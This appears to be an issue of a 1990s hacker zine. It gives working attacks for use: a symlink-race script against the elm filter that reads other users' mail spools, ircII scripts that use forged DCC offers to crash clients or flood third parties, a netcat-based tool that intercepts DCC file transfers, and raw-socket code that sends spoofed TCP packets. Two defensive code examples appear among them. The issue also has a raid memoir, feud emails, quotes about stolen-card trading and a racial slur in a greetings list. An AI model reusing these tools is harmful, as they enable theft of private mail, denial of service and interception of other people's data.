The elm filter under linux runs setgid mail, thus allowing it to freely read and write from users' mail spools. It is only through the integrity of its code that the security of linux's mail system is protected; and in this respect it falls short. In FEH #2, we printed mail-clobber, code that exploited filter in order to destroy a user's mail spool. But the capabilities to exploit filter extend beyond destruction of a mail spool; you can also use it to read a mail spool.

The specific problem that is exploited in this hole is the way filter uses a temporary file to store the input to it, and then subsequently send it back out according to the filter. Because of the modularity of the coding, in the main filter.c, the temporary file is opened, and then written to; after which it is closed. The mailmessage function is then called, with the purpose of forwarding that mail, written to the temporary file, to whatever destination is specified in the filter. At the start of this process, the temporary file is opened, and the contents of it are dumped to the mail spool of the user the mail is being forwarded to.
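The write, close, then reopen-by-name sequence described above is safe only if the name still refers to the file that was written. As an added example (not filter's source; the file names and contents are constructed), this C code replaces the name with a symlink between the write and the read-back and compares reopening by name, reopening with O_NOFOLLOW, and rewinding the descriptor that was never closed.

```c
#ifndef _POSIX_C_SOURCE
#define _POSIX_C_SOURCE 200809L
#endif
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <unistd.h>

/* Reopen by name, as in the pattern described above. extra_flags lets the
 * caller add O_NOFOLLOW. Returns bytes read, or -1. */
ssize_t read_by_name(const char *path, int extra_flags, char *buf, size_t n)
{
    ssize_t got;
    int fd = open(path, O_RDONLY | extra_flags);

    if (fd < 0)
        return -1;
    got = read(fd, buf, n - 1);
    close(fd);
    buf[got > 0 ? got : 0] = '\0';
    return got;
}

/* Never reopen: rewind the descriptor the data was written through. */
ssize_t read_by_fd(int fd, char *buf, size_t n)
{
    ssize_t got;

    if (lseek(fd, 0, SEEK_SET) < 0)
        return -1;
    got = read(fd, buf, n - 1);
    buf[got > 0 ? got : 0] = '\0';
    return got;
}

struct reopen_result {
    char by_name[64];       /* what a reopen by name reads back */
    char by_fd[64];         /* what the kept descriptor reads back */
    int  nofollow_refused;  /* 1 if O_NOFOLLOW rejected the swapped name */
};

int run_reopen_demo(struct reopen_result *r)
{
    char dir[] = "/tmp/reopen-demo-XXXXXX";
    char tmp[64], other[64], scratch[64];
    const char *msg = "message to forward\n";
    const char *spool = "contents of some other file\n";
    int fd, ofd;

    memset(r, 0, sizeof *r);
    if (mkdtemp(dir) == NULL)
        return -1;
    snprintf(tmp, sizeof tmp, "%s/filter.tmp", dir);
    snprintf(other, sizeof other, "%s/other-file", dir);

    /* Constructed files: the program's temp file and an unrelated file. */
    ofd = open(other, O_WRONLY | O_CREAT | O_EXCL, 0600);
    fd = open(tmp, O_RDWR | O_CREAT | O_EXCL, 0600);
    if (ofd < 0 || fd < 0)
        return -1;
    if (write(ofd, spool, strlen(spool)) < 0 || write(fd, msg, strlen(msg)) < 0)
        return -1;
    close(ofd);

    /* Between the write and the read-back the name is replaced by a
     * symlink. The open descriptor still refers to the original file. */
    if (unlink(tmp) != 0 || symlink(other, tmp) != 0)
        return -1;

    read_by_name(tmp, 0, r->by_name, sizeof r->by_name);
    r->nofollow_refused =
        read_by_name(tmp, O_NOFOLLOW, scratch, sizeof scratch) < 0;
    read_by_fd(fd, r->by_fd, sizeof r->by_fd);

    close(fd);
    unlink(tmp);
    unlink(other);
    rmdir(dir);
    return 0;
}

int main(void)
{
    struct reopen_result r;

    if (run_reopen_demo(&r) != 0)
        return 1;
    printf("reopen by name read: %s", r.by_name);
    printf("O_NOFOLLOW reopen refused: %d\n", r.nofollow_refused);
    printf("kept descriptor read: %s", r.by_fd);
    return 0;
}
```

O_NOFOLLOW only rejects a symlink at the final path component, so it does not cover a name replaced by a different regular file. Keeping the descriptor open, and creating the file somewhere other users cannot rename it, avoids the question.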
At any point after the file has been initially opened by the main filter function, since the user running filter has permissions on that temp file, it can be rm'd. The existing temp file can then be replaced with a symbolic link to any file that group mail has read permissions on. When it is opened in the mailmessage function, the symbolic link is followed and whatever file that was pointed to will be read in, and the contents forwarded to the user specified in the mail spool.

The complete exploit is shown below:

Program: filter, an elm utility
Affected Operating Systems: linux
Requirements: account on machine
Security Compromise: user can read any mail spool readable by grp mail. (usually everything, sometimes not root)
Synopsis: filter writes out the mail to be forwarded to a temporary file, which is then closed and reopened; if when the temporary file is reopened it is a symlink to a mail spool, filter will proceed to forward the contents of that file as if it was the original message.

fread.sh:

#!/bin/sh
echo 'if (always) forward' $LOGNAME > /tmp/fread-ftr.tmp
echo From: ReDragon > /tmp/fread-msg.tmp
echo To: $LOGNAME >> /tmp/fread-msg.tmp
echo Subject: Filter Exploit >> /tmp/fread-msg.tmp
echo sleep 2 > /tmp/fread-sh.tmp
echo cat /tmp/fread-msg.tmp >> /tmp/fread-sh.tmp
chmod +x /tmp/fread-sh.tmp
/tmp/fread-sh.tmp|filter -f /tmp/fread-ftr.tmp &
FREAD=`ps|grep 'filter -f'|grep -v grep|awk '{print $1}'`
rm -f /tmp/filter.$FREAD
ln -s /var/spool/mail/$1 /tmp/filter.$FREAD
sleep 2
rm -f /tmp/fread-ftr.tmp /tmp/fread-msg.tmp /tmp/fread-sh.tmp /tmp/fread-ftr.tmp /tmp/filter.$FREAD
FREAD=

<---------------------------------------------------------------------------->

IRC DCC Protocol Security Holes
by FEH Staff

DCC is the IRC client-side protocol used to send information directly between clients.
Normally, when a message is sent between 2 users, it goes from the user's client to the irc server that client is connected to, then to the server the receiver is connected to, and finally to the user. Obviously that is a lot of wasted bandwidth compared to sending information directly between two clients, thus DCC is used.

DCC is among the simplest of setups for communication, consisting merely of a tcp connection between two computers, across which data is passed. Since error correction, flow control, etc. are already handled by the tcp protocol, there is no need to worry about any such issues.

When you initiate a dcc send, a number of things happen:

1. Your irc client opens an unprivileged tcp port (>1024), and listens for an incoming connection.
2. Your irc client sends:
     A) The file name
     B) Your ip address
     C) The number of the tcp port it is listening on
     D) The size of the file you are sending (in bytes)
3. The remote irc client then opens a tcp connection to the specified ip address, transmits a bit of garbage to initiate the transfer, and dumps whatever is sent over that tcp port to a file.
4. At the time the first connection to the tcp port is established, your irc client stops listening for new connections, and dumps the file over the now-established tcp connection.

What you can do with this:

The simplest uses of this setup are denial-of-service attacks. Some IRC clients (ircII earlier than 2.8.2 and Homer) hang while trying to establish a dcc connection. Thus, by placing the ip address of a nonexistent machine in your dcc send request, you can cause the irc client of a user who chose to get the file to hang long enough to cause a ping timeout. (Note: for readability, the actual control characters in this script have been replaced with ascii representations; to actually execute, convert accordingly.)

dcckill.irc:

echo Loading DCC KILL
echo Syntax: DCCK nick filename size
echo ^Bfilename^B and ^Bsize^B are bogus values.
alias DCCK {
  ^assign dcc_killing 0
  //quote PRIVMSG $0 :^ADCC SEND $1 12341234 4321 $2^A
  echo *** Sent DCC KILL request to $0
  ^assign dcc_killing 1
}
--- cut here ---

A similar trick, less damaging, but quite capable of confusing the hell out of a lot of people, is to direct remote irc clients to connect to the chargen port of some machine on a T3. (Note that ircII will not connect to a privileged port, although all of the GUI clients I have tested will.) You can thus use somebody else's bandwidth to dump garbage to a remote machine.

dccchargen.irc:

echo Loading DCC CHARGEN
echo Syntax: DCCCHARGEN nick filename size
echo ^Bfilename^B and ^Bsize^B are bogus values.
alias DCCCHARGEN {
  ^assign dcc_charging 0
  //quote PRIVMSG $0 :^ADCC SEND $1 2230084270 19 $2^A
  echo *** Sent DCC CHARGEN request to $0
  ^assign dcc_charging 1
}

Aside from denial of service attacks, the primary interesting thing you can do is intercept dcc file transfers. Because ircII listens for incoming connections from ANY machine when you do a dcc send, all that is needed is to open a tcp connection to the appropriate port (using netcat for example), dump a few garbage characters to initiate the transfer, and then store whatever comes across the tcp connection in a file. You lose the filename, but for those who are willing to take a hex editor to the first few bytes of what they get, figuring out what the file format is should be no problem.

The simplest way to determine which port a dcc transfer is going to be on is if you have user access on the machine. If you watch for new listens on ephemeral ports (using netstat or equivalent), you can then quickly open them, before the actual recipient has a chance to do so. Here is a quick linux-only program to parse the output of netstat -a, and dump the contents of whatever dcc sends start from the local machine to a file.

dccgrab.c:

/* dccgrab 0.01 */
/* A quick program to intercept dcc sends. */
/* Obviously, don't use this without appropriate permission. */
/* Requires that a copy of netcat be in the path, and a copy of */
/* netcat's telnet.d file needs to be in the current directory */
/* output will be written to snagfile */
/* known bugs: bot detection should be improved */
/* Only works with linux netstat */
#include
#include
#define TRUE 1
#define FALSE 0

int main (){
  int SnaggedOne;
  FILE *f;
  char NetstatLine [1024];
  char CommandString [1024];
  char *colin = ":";
  char *tempstr;
  int port;
  int i;

  port=1;
  SnaggedOne=FALSE;
  while (!SnaggedOne){
    system ("netstat -a |egrep LISTEN |egrep ':' >/tmp/.dcc2345");
    f=fopen ("/tmp/.dcc2345","rt");
    if (f==NULL) {
      fprintf (stderr,"Unable to open file!");
      exit (1);
    }
    port =0;
    while (port == 0) {
      fgets (&NetstatLine[0],1024,f);
      tempstr = strstr (&NetstatLine[0],colin);
      tempstr += sizeof (char);
      sscanf (tempstr,"%d ",&port);
      /* let's deal with ports we don't want to touch */
      if (port < 1024) /* privileged */
        port=0;
      if (port == 6000) /* X */
        port=0;
      if (port == 8080) /* proxy servers */
        port=0;
      /* bots... */
      if (port == 2222)
        port=0;
      if (port == 3333)
        port=0;
      if (port == 4444)
        port=0;
      if (port == 5555)
        port=0;
      if (port == 6666)
        port=0;
      if (port == 7777)
        port=0;
      if (port == 8888)
        port=0;
      if (port == 9999)
        port=0;
      if (feof (f))
        port=-1;
    }
    fclose (f);
    if (port >0) {
      SnaggedOne=TRUE;
      printf ("snagging something from port %d\n",port);
      sprintf (&CommandString[0],"nc 127.0.0.1 %d < ./telnet.d > snagfile",port);
      system (CommandString);
    }
    else
      sleep (1);
  } /* while !snaggedone*/
  return 0;
}

This is obviously not the optimal solution for stealing dcc transfers, and only works locally, but it provides a good basis for working on your own code to improve upon.

If you can determine which port the kernel on a remote system assigned last, you stand a good chance at guessing the port number for the next dcc send, simply because most kernels assign tcp ports in increasing order.
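The bogus offers in dcckill.irc and dccchargen.irc work because the receiving client acts on the address and port fields of the DCC SEND request without checking them. As an added example (not from the original article), here is a receive-side validator for the text between the ^A delimiters; the verdict names, the policy of requiring the offered address to equal the sender's address as seen by the client, and the 192.0.2.x / 198.51.100.x sample addresses are assumptions.

```c
#include <errno.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

enum dcc_verdict {
    DCC_OK = 0,
    DCC_MALFORMED,      /* not "DCC SEND name addr port size" with numeric fields */
    DCC_BAD_NAME,       /* path separators or a leading dot in the file name */
    DCC_PRIV_PORT,      /* port below 1024 (chargen, echo, ...) */
    DCC_BAD_ADDR,       /* 0.x.x.x, loopback, multicast or reserved */
    DCC_ADDR_MISMATCH   /* offer points at a host other than the sender */
};

struct dcc_offer {
    char     name[256];
    uint32_t addr;      /* host byte order, as carried in the offer */
    uint16_t port;
    uint32_t size;
};

/* Strict decimal parse: digits only, whole token, value <= max. */
static int parse_dec(const char *s, unsigned long long max, unsigned long long *out)
{
    char *end;

    if (s[0] < '0' || s[0] > '9')      /* rejects "", "-1", "+1" */
        return -1;
    errno = 0;
    *out = strtoull(s, &end, 10);
    return (errno != 0 || *end != '\0' || *out > max) ? -1 : 0;
}

/* Dotted-quad rendering, for showing the user where a connect would go. */
const char *dcc_addr_str(uint32_t a, char buf[16])
{
    snprintf(buf, 16, "%u.%u.%u.%u", (unsigned)(a >> 24), (unsigned)((a >> 16) & 255),
             (unsigned)((a >> 8) & 255), (unsigned)(a & 255));
    return buf;
}

/* payload: CTCP text without the ^A bytes. sender_addr: the address the
 * client already associates with the sending nick (assumed to be known). */
enum dcc_verdict dcc_check_offer(const char *payload, uint32_t sender_addr,
                                 struct dcc_offer *o)
{
    char addr[16], port[16], size[16];
    unsigned long long a, p, sz;
    unsigned first;
    int used = 0;

    memset(o, 0, sizeof *o);
    if (sscanf(payload, "DCC SEND %255s %15s %15s %15s%n",
               o->name, addr, port, size, &used) != 4 || payload[used] != '\0')
        return DCC_MALFORMED;
    if (parse_dec(addr, UINT32_MAX, &a) || parse_dec(port, 65535, &p) ||
        parse_dec(size, UINT32_MAX, &sz))
        return DCC_MALFORMED;
    o->addr = (uint32_t)a;
    o->port = (uint16_t)p;
    o->size = (uint32_t)sz;

    if (o->name[0] == '.' || strpbrk(o->name, "/\\") != NULL)
        return DCC_BAD_NAME;
    if (o->port < 1024)                 /* the chargen redirect uses port 19 */
        return DCC_PRIV_PORT;
    first = o->addr >> 24;
    if (first == 0 || first == 127 || first >= 224)
        return DCC_BAD_ADDR;
    if (o->addr != sender_addr)
        return DCC_ADDR_MISMATCH;
    return DCC_OK;
}

int main(void)
{
    /* Constructed offers; file names and sizes are placeholders. The second
     * and third reuse the address/port pairs from the two scripts above. */
    static const char *offers[] = {
        "DCC SEND notes.txt 3221225994 5001 2048",
        "DCC SEND file 2230084270 19 1000",
        "DCC SEND file 12341234 4321 1000",
        "DCC SEND file 3325256711 5001 1000",
    };
    const uint32_t sender = 3221225994u;    /* 192.0.2.10, constructed */
    struct dcc_offer o;
    char ip[16];
    size_t i;

    for (i = 0; i < sizeof offers / sizeof offers[0]; i++) {
        int v = dcc_check_offer(offers[i], sender, &o);
        printf("verdict=%d addr=%s port=%u  %s\n", v, dcc_addr_str(o.addr, ip),
               (unsigned)o.port, offers[i]);
    }
    return 0;
}
```

A sender behind address translation will legitimately fail the address comparison, so DCC_ADDR_MISMATCH is better surfaced as a prompt showing the decoded address than silently dropped.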
Thus, if you can get a bot to dcc chat you, and you record the port number, and then bombard the next 30 or so tcp ports with attempted connections, you stand a very good chance at getting the next file that that bot happens to send somebody. Actual implementation of this is left as an exercise to our readers. Good Luck!

<---------------------------------------------------------------------------->

Example Packet Construction Code
by SnoCrash

/* Send a "Christmas Tree Packet" (SYN, URG, PSH, FIN and 1 Byte of data) */
/* from source.port to dest.port. This type of packet is also known as a */
/* "Kamikaze Packet", "Nastygram", and "lamp test segment". */

pktsend.h:

/* Prototypes. */
int sendpkt_tcp(struct sockaddr_in *, unsigned short int, char *,
                unsigned short int, unsigned long int, unsigned long int,
                unsigned short int, unsigned short int, unsigned char,
                unsigned long int, unsigned long int);
int sendpkt_udp(struct sockaddr_in *, unsigned short int, char *,
                unsigned short int, unsigned long int, unsigned long int,
                unsigned short int, unsigned short int);

/*
 * in_cksum --
 * Checksum routine for Internet Protocol family headers (C Version)
 */
unsigned short in_cksum(addr, len)
u_short *addr;
int len;
{
  register int nleft = len;
  register u_short *w = addr;
  register int sum = 0;
  u_short answer = 0;

  /*
   * Our algorithm is simple, using a 32 bit accumulator (sum), we add
   * sequential 16 bit words to it, and at the end, fold back all the
   * carry bits from the top 16 bits into the lower 16 bits.
   */
  while (nleft > 1) {
    sum += *w++;
    nleft -= 2;
  }

  /* mop up an odd byte, if necessary */
  if (nleft == 1) {
    *(u_char *)(&answer) = *(u_char *)w ;
    sum += answer;
  }

  /* add back carry outs from top 16 bits to low 16 bits */
  sum = (sum >> 16) + (sum & 0xffff); /* add hi 16 to low 16 */
  sum += (sum >> 16); /* add carry */
  answer = ~sum; /* truncate to 16 bits */
  return(answer);
}

/* Send faked TCP packet. */
int sendpkt_tcp(sin, s, data, datalen, saddr, daddr, sport, dport, flags,
                seq, ack)
struct sockaddr_in *sin;
unsigned short int sport, dport, s, datalen;
unsigned long int daddr, saddr, seq, ack;
unsigned char flags;
char *data;
{
  struct iphdr ip;
  struct tcphdr tcp;
  static char packet[8192];
  unsigned short int len=0;
  char tcpbuf[8192];
  char *p;

  /* Fill in IP Header values. */
  ip.ihl = 5;
  ip.version = 4;
  ip.tos = 0;
  ip.tot_len = htons(40 + datalen);
  ip.id = htons(31337 + (rand()%100));
  ip.frag_off = 0;
  ip.ttl = 255;
  ip.protocol = IPPROTO_TCP;
  ip.check = 0;
  ip.saddr = saddr;
  ip.daddr = daddr;
  ip.check = in_cksum((char *)&ip, sizeof(ip));

  /* Fill in TCP Header values. */
  tcp.th_sport = htons(sport);
  tcp.th_dport = htons(dport);
  tcp.th_seq = htonl(seq);
  tcp.th_ack = htonl(ack);
  tcp.th_x2 = 0;
  tcp.th_off = 5;
  tcp.th_flags = flags;
  tcp.th_win = htons(10052);
  tcp.th_sum = 0;
  tcp.th_urp = 0;

  /* Add crap for our TCP checksum. */
  memset(tcpbuf, 0, 8192);
  p = tcpbuf;
  memcpy(p, &(ip.saddr), 8); /* This will copy saddr & daddr into the buffer */
  p += 9; /* Skip the 0 operator */
  memcpy(p++, &(ip.protocol), 1);
  len = htons(datalen + sizeof(tcp));
  memcpy(p, &(len), 2);
  p += 2;
  memcpy(p, &tcp, sizeof(tcp)+datalen);

  /* Now fill in the checksum. */
  tcp.th_sum = in_cksum((char *)tcpbuf, sizeof(tcp)+12+datalen);

  /* Now we copy our packet into a nice character array for sending. */
  memcpy(packet, (char *)&ip, sizeof(ip));
  memcpy(packet+sizeof(ip), (char *)&tcp, sizeof(tcp));
  memcpy(packet+sizeof(ip)+sizeof(tcp), (char *)data, datalen);

  /* And send... */
  return(sendto(s, packet, sizeof(ip)+sizeof(tcp)+datalen, 0,
                (struct sockaddr *)sin, sizeof(struct sockaddr_in)));
}

/* Send faked UDP packet. */
int sendpkt_udp(sin, s, data, datalen, saddr, daddr, sport, dport)
struct sockaddr_in *sin;
unsigned short int s, datalen, sport, dport;
unsigned long int saddr, daddr;
char *data;
{
  struct iphdr ip;
  struct udphdr udp;
  static char packet[8192];

  /* Fill in IP header values. */
  ip.ihl = 5;
  ip.version = 4;
  ip.tos = 0;
  ip.tot_len = htons(28 + datalen);
  ip.id = htons(31337 + (rand()%100));
  ip.frag_off = 0;
  ip.ttl = 255;
  ip.protocol = IPPROTO_UDP;
  ip.check = 0;
  ip.saddr = saddr;
  ip.daddr = daddr;
  ip.check = in_cksum((char *)&ip, sizeof(ip));

  /* Fill in UDP header values. Checksums are unnecessary. */
  udp.source = htons(sport);
  udp.dest = htons(dport);
  udp.len = htons(8 + datalen);
  udp.check = (unsigned short int)NULL;

  /* Copy the headers into our character array. */
  memcpy(packet, (char *)&ip, sizeof(ip));
  memcpy(packet+sizeof(ip), (char *)&udp, sizeof(udp));
  memcpy(packet+sizeof(ip)+sizeof(udp), (char *)data, datalen);

  return(sendto(s, packet, sizeof(ip)+sizeof(udp)+datalen, 0,
                (struct sockaddr *)sin, sizeof(struct sockaddr_in)));
}
-- cut here --

treelight.c:

#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include "pktsend.h"

#define err(x) { fprintf(stderr, x); exit(1); }

unsigned long int resolve(host)
char host[255];
{
  unsigned long int addr;
  struct hostent *he;

  if((he = gethostbyname(host)) == NULL){
    if((he = gethostbyaddr(host, strlen(host), AF_INET)) == NULL)
      return -1;
  }
  bcopy(*(he->h_addr_list), &(addr), sizeof(he->h_addr_list));
  return(addr);
}

void main(argc, argv)
int argc;
char **argv;
{
  unsigned long int saddr, daddr;
  unsigned short int sport, dport;
  struct sockaddr_in sin;
  int s;

  if(argc!=5)
    err("Usage: treelight \n");

  /* Resolve Addresses. */
  if((saddr=resolve(argv[1])) == -1)
    err("Unable to resolve source address.\n");
  if((daddr=resolve(argv[3])) == -1)
    err("Unable to resolve destination address.\n");

  /* Convert port numbers to integers. */
  sport=(unsigned short int)atoi(argv[2]);
  dport=(unsigned short int)atoi(argv[4]);

  /* Open raw socket. */
  if((s = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) == -1)
    err("Unable to open raw socket.\n");

  sin.sin_family = AF_INET;
  sin.sin_addr.s_addr= daddr;
  sin.sin_port = dport;

  if((sendpkt_tcp(&sin, s, "1", 1, saddr, daddr, sport, dport,
                  TH_SYN|TH_URG|TH_PUSH|TH_FIN, 2387283, 2387238)) == -1)
    err("Error sending our rad little packet.\n");
}
-- cut here --

<---------------------------------------------------------------------------->
<---------------------------------------------------------------------------->

Breakfast with the Secret Service
by Kamakize

September 8th 1995 6:42 am. The phone rings. I let it ring a few times, then roll over and pick it up only to hear a dial tone. I open my eyes and look over towards my caller-id box to see who it was. The display is blank; according to the machine, the phone never rang. Confused, but more concerned with sleep at the moment, I closed my eyes and drifted back to sle....BEWM, my door slams open. My head against my pillow, my eyes bulge as two large men enter my room and pronounce: "Secret Service". They each grab an arm and drag me down the stairs, while they informed me "cellular phone fraud is costing the United States one million dollars a day". Some days being a hacker is less fun than others.

They started by asking me if anyone was home. They then slapped me with the warrant and let in about 4 local police officers from the county. They opened my parents' room and said "Treasury Department" and grabbed them to the kitchen table, and then asked for all weapons in the house. Having unloaded the sole gun in the house, the search commenced.

First they asked for cooperation, and started taking the basic information from me: Name, SSN, Address (WHY? WHY did they ask for the address, when they were at the damn place?), and all phone numbers of the house, plus releases to search the cars (a search warrant for a HOUSE does NOT include the cars or "out buildings" on your premises, only the main building).
By the time they got us all down it was about 7:15am, and they started to ask basic questions that your school or any credit agency knows when you apply for something (ie: employment history, etc., wage at work, salary, etc.). Then, the Computer Expert from DC came in and started to fool with our family's business computer, and after scanning it, decided to let it be, since he found nothing wrong. Then they visited my room (without my presence) and searched my room somewhat half-ass, as if they weren't finding what they wanted. Finally, they gave up, since I never had what they were looking for to begin with.

They took me outside, and started questioning me. They kept asking me WHERE is the EPROM burner, over and over, WHERE is the EPROM burner? Since there wasn't one, that line of questioning wasn't going very far. I told them I never cloned phones, and didn't know. They frowned. Then they started to ask me what I knew about PMF. At this time when they out of the blue said "PMF", I suddenly knew why they were there. I had an account on his board, and had downloaded how-to files on cloning phones. Well, information isn't illegal, but apparently it is enough for a search warrant.

I was taken outside countless times, and around 11:00am they let me sit down and wait out the remainder of their search. They never once looked at my computer on-line, not once. But finally, around 12:30pm they brought me up to my room to show me what they were going to take with them; at 12:45pm they left.

September 18th, two weeks after the search, they had me go downtown to "sign a few papers and documents." I have yet to hear a word back, and apparently the people in New Jersey working on the case are not talking much. That day, the agents told me that they would get back to us before Christmas. Christmas has come and gone. Six people were arrested in "Cybersnare", but there have not been any arrests after that day. They were after people for cell phone cloning, and for selling actual credit cards. It was all a result of people using Celco 51; for more information about that read the article in FEH #2; a brief outline is provided below.

In January of 1995, PMF came onto irc, pushing his bbs, demanding that you prove you can get on by showing your knowledge of cell phones. In reality, it wasn't PMF at all that was really running the board, it was 'Carder One' that was behind it. It was set up in PMF's apartment building, and he took care of it snitching on whatever. In June, he went to Summercon '95 (a public hacker convention); a lot of his 'friends' were there.. but they didn't know until 3 months later, he would turn the table over. While he was there he had 2 cellular phones; he showed me one. While outside on the street in Atlanta, I asked him 'is that legit?' He promptly said "What do you think?". I asked him again. That was ONE question he would never answer. Now we know.

Possessions seized from me:

9/8/95 - 6:40am Date + Time warrant served.

1) packard bell monitor mode # and serial # listed
1) computer - CTG (no serial #)
1) model 5001 focus keyboard serial #
1) PC concepts mt 767 - power director Serial #
1) HP desk Jet 500C serial #
1) Caller Identification box - slim light , model #64
103) 3.5" floppy diskettes
Miscellaneous cables and connectors
4) boxes removed from car, misc documents
1) book: "Internet firewalls and network security"

That's all. Weird, eh? Taking the power director. Taking an ink jet; when asked why, the guy said so we can tell if you printed these documents here. I said from an INK JET? (hmmm makes me wonder if the government has high technology to summon ink back into a cart and see if it matches the same ink in the cart).

Overall there was one nice agent there; he did talk about the SS some while the others did their duty. They were there for about 7 hours, with a few county cops coming and going.

Strange, the raid didn't seem as "scary" as it should have been. Two weeks later the media came calling to me. 2 weeks.

<---------------------------------------------------------------------------->

---------------------------------------------------------------------
I'm a Hacker, You're a Hacker, wouldn't you like to be a Hacker too..
- Some thoughts from Mythrandir
---------------------------------------------------------------------

Hackers are everywhere. They are in the news. They are in the media. They are on the news groups. They are on IRC. And they are multiplying at an exponential rate. Right?...

Nope.

But this is the way that the world sees it. This is the way that the policy makers view the situation. This is the way that all of these so called new hackers believe is happening. The revolution is here! Let's cause havoc and fight the system. Destroy big brother. We can free the information. We can liberate. Let's hack into machines with all of these scripts that are around. Let's get information from everyone. We can get free access to AOL. We can steal money from people. We can take whatever we want. We are elite. Right?...

Nope.

What in the world is happening? Of course it is quite simple. Hacking has moved into the mainstream. It has been glamourized by the media. It is almost a household word. I wouldn't be surprised if we get trading cards. It'd be more interesting than the OJ Simpson trading cards.. Because of this, everyone is thinking that "hacking" is cool. It seems like every kid in the country wants to be a hacker. Everyone is building redboxes and running AOHell.

With all of this, I think it is time for a little re-education. You see it is real simple. So simple that it defies so many.

Tools do not make a hacker. Breaking into machines does not make you a hacker. Talking like you are elite does not make you a hacker. Only one thing makes you a hacker. Your Mind.

Be Elite, think first, ask questions later.
- Mythrandir
mythrndr@infonexus.com

<---------------------------------------------------------------------------->

Gray Areas
Who's On Your Side?
by FEH Staff

"I didn't have anything against her until she threatened me."
-Emmanuel Goldstein

It is not all fun and games when you are publishing a hacker-oriented zine for profit. Two of the most well known, 2600 and Gray Areas, after what seemed like outward respect for each other, have fallen into name calling and threats. Netta has threatened to take this to the people, so here they are...

Date: Tue, 14 Nov 95 01:21 EST
From: grayarea@gti.net (Gray Areas Inc.)
To: emmanuel@2600.com
Subject: shame
Status: RO

it's a shame u did not tell me u4ea calls ur home on a friendly basis to talk to phiber who i believe is still on federal probation. please answer this before i take it public on the net. it's one thing for dennis and u4ea to fuck with me and my company. it's far another for you to be AT ALL involved in it. my logs show u message dennis every time he's on irc trying to get in better with him. i am not at all pleased to see the pieces of the puzzle fitting together as if you are befriending them so they will fuck with me and my company instead of you and yours. i've stuck up for you when people wanted to fuck you up. i wish you had the sense to at least stay out of this, or to have been truthful with me that you have chosen to side with them.

p.s. this mail is intended for your eyes only. my last two calls to you were discussed with other people. if you wanna discuss my business with kc and your other friends, rest assured i'll tell (severe threats omitted).

---

Date: Tue, 14 Nov 95 01:35 EST
From: grayarea@gti.net (Gray Areas Inc.)
To: emmanuel@2600.com
Subject: Re: shame
Status: RO

um, no. u seem to like the idea of me giving you what i have. it's a one-way street. it's enuf to say "phiber is wigging out at that memory of yours." i've done all of the talking to you i'm ever gonna be able to do i guess.
as for what your involvement is, that's what i offered you the opportunity to comment on before this went further. i'll now let other people decide. there are LOTS of people interested in both you and phiber. you of all people should know that everything you do in this scene is practically public record and that interfering with the existence of another publication is a serious legal matter.

---

From: Emmanuel Goldstein
Subject: Re: shame
To: grayarea@gti.net (Gray Areas Inc.)
Date: Tue, 14 Nov 1995 01:46:06 -0500 (EST)

well, then you leave me little choice. from what i can see, you're either writing your own fiction now or you've been duped by somebody else. either way, i cannot allow you to threaten friends of mine with this nonsense. i strongly suggest you tell me specifically what you're talking about before this gets out of control.

---

<---------------------------------------------------------------------------->
<---------------------------------------------------------------------------->

*******************************************************
*** FEH Eleet Quotes for the month of December 1995 ***
***              Assembled By SnoNinja              ***
*******************************************************

at least i have a real life cheeseball: I am working on unix not linux PMF is the best hacker I know <|al|> everyone will be elite for 15 minutes. i'll hack your FBI computer in a second! i wanna be associated with golden showers I contract some of my coding out to SnoNinja *Vision23* listen ReD, you're a fucking punk. I don't have the time to waste figuring out how to ICMP bomb whatever machine you're on, so for now I'll have to settle for words. You're a real popular name. So noone will suspect it was me who committed digital murder. <_X> it took me 15 minutes to remember someones name FEH HAS LESS USEFUL INPHO THAN ALL OTHER ELECTRONIC MAGAZINES COMBINED hey anyone here willling to trade aol accounts for cc#'s?
<-[ReDragon]-> don't do that this could be a *Really* Stupid question, but im trying to get password file here at the U of A, and ive tryed in all the places where text files say to look, and so far all ive been able to find is /etc/passwd. that may look to be the correct thing.. try not to op fools. Anyone want to trade "sitez" (Ftp site with pirated comercial software) or CC's (Stolen Credit Card Information), msg me. Let's talk. how can i make a war games dialer? im looking for phiber_optik... have you seen him lately?? * begin quote exactly. FEH is too closely scrutinized, too high profile YER ARTICLE ON INFILTRATING GOVERNMENT SITES ROOLZ BUGS oh well, there is always plausible deniability to fall back on * end quote LEMME IN FEH 4 OR I'M NOT GIVING YOU ANY AFRO GREEZE <_X> -r-x------ 1 root root 698170 May 18 1995 free.org.passwd* I got a program, 64,000 linez of code, and it does nothing not bad at least it compiles clean FEH is dope I am whoring myself for quotes *Crax* IF YOU DIE I'LL REFUND YER MONEY * begin quote Why would you rm any site? cuz I am a fucking gangster * end quote no one can be as lame as me linux is the mac daddy os.. but not on a mac [BigAl:bigal@carroll.com] hey dude you a pro? I need help [wierd:bob@netaccess.on.ca] feh kicks ass, i am just a beginner now, but one day i will be great *monk202* Feh cracks me up. I LOVE IT! This is what Phrack should've been... <----------------------------------------------------------------------------> ---=== T H E ===--- -- -- -- ---- -- -- -- -- -- -- -- -- --- -- -- -- --- --- -- -- -- - --- -- -- ---- -- -- -- ---=== L I S T ===--- Allen 3. Smith Greetz to: all the homies hangin w/ the cool posse. Nigs in the house. 007, james kahn, marissa tomei, 8o8 state, 011-posse, the leets, e-paq, all the j00s, whatney's cream stout, aol lamerz, all bofh's, phase dist, optik n3rve, BNF, Kleene, feynman, turing, shannon, nyquist, kernighan, pike, VSB, QAM, NRZ, and most of all to the #hack chicks. 
word werd wird wurd w1rd w3rd w0rd
whord wherd whird wh1rd wh3rd wh0rd
wirred w1rred worred w0rred wirr3d w1rr3d worr3d w0rr3d
whirred wh1rred whorred wh0rred whirr3d wh1rr3d whorr3d wh0rr3d

<---------------------------------------------------------------------------->

Mac's Vs. PC's
Artikle By nicotine (The one that hangz on #hack not #korea) aka `nic0tine

wh4zz4p:x0x,xgirl,redragon,katana,mudman,snoninja,l0ra,vampirella,lynch,
tigger,ice-9,roach,kemo,strict9,hosaka,andtherestofthehappy#hackfamily.

Listen to this. This has been a long debate of people, basicly the result is that the people that want it easy but more expensive and not as much software choose makz, and the people that want it hard but less expensive and lots more software choose pc's, but now sience the "PC Echange" for makz can change shit over its kinda changed... makz are better for webin' and aol and pc's for hacking and shit.

PC's Very Own Debate:
"Forget That Makz Are Lame" from "The Real Cyberpunk Fake Book":

